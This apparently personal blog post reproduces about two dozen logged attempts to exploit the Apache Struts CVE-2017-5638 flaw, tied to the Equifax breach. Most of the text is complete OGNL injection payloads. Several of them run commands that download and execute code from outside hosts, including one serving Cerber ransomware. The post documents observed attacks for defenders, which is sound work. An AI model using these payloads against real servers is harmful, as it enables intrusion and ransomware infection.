Equifax was compromised through Apache Struts (CVE-2017-5638); here are example attack attempts from my own logs

On 15 September 2017, Equifax stated their compromise happened through exploitation of CVE-2017-5638, a vulnerability in Apache Struts — published in March 2017 after being exploited in the wild — that involves a crafted Content-Type HTTP request header. For those interested, here are log rules of 28 (untargeted) requests that attempted to exploit this vulnerability on my own blog (which does not run Apache Struts) between 10 March 2017 and 14 September 2017.

The lines are quite long; scroll to right in the grey dialog below. Each line contains a single “#cmd=” that defines a command and a single “#cmds=” (I highlighted those parts in bold below) that feeds the command to cmd.exe on Windows systems and /bin/bash on non-Windows systems. 12 of 28 cases attempt to download & run code; the remaining 16 cases only execute echo “Struts2045” or echo “Amen4Wolves” and seem to be probes for vulnerability. In (only) one case the payload could still be accessed: hxxp://82.165.129.119/UnInstall.exe, which contains Cerber ransomware. So, this was an attempt to distribute ransomware by exploiting CVE-2017-5638; the source was 220.191.231.222, registered to ‘Jinhua Electronic Government Network’.

blog.cyberwar.nl-forensic.log:+25030:58c2e12a:40|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/.jb %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/.jb ; fetch http%3a//65.254.63.20/.jb ; perl .jb ;rm -rf .jb*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+18708:58ce3b02:5f|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+25980:58d00e81:14|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+5491:58d2431c:10|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c echo open 82.165.129.119 21 >> ik &echo user anonymous anonymous>> ik &echo binary >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s%3aik &del ik &1.exe &exit').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+5481:58d2431c:21|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/a%7csh ; rm -rf a ; curl -O http%3a//65.254.63.20/a ; sh a ').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+4485:58d2431c:34|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='BITSAdmin.exe /Transfer JOB http%3a//82.165.129.119/UnInstall.exe %25TEMP%25/UnInstall.exe & %25TEMP%25/UnInstall.exe').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+13314:58d45e97:54|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+4017:58ebf9b6:46|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+14242:58f02f0c:f9|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+16047:58f02f12:9|GET /login/ HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+15024:58f02f14:b2|GET /wp-login.php HTTP/1.1|Accept-Encoding:identity|Host:blog.cyberwar.nl|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+6171:590e8bf2:64|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+21732:59233fb2:7|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 185.159.82.142/10 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+26909:5924b39c:2d|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+14205:592ab9f1:d8|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 188.138.105.88/18 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+15355:592ab9f1:16|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 188.138.105.88/18 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+15448:592ab9f1:4|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 188.138.105.88/18 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+12791:59359766:28|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+23218:5940ef00:180|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+26725:5949c3cb:58|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+6599:597b4f8e:d9|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+18295:597ef9c9:1e|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+24880:5980d5ad:0|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
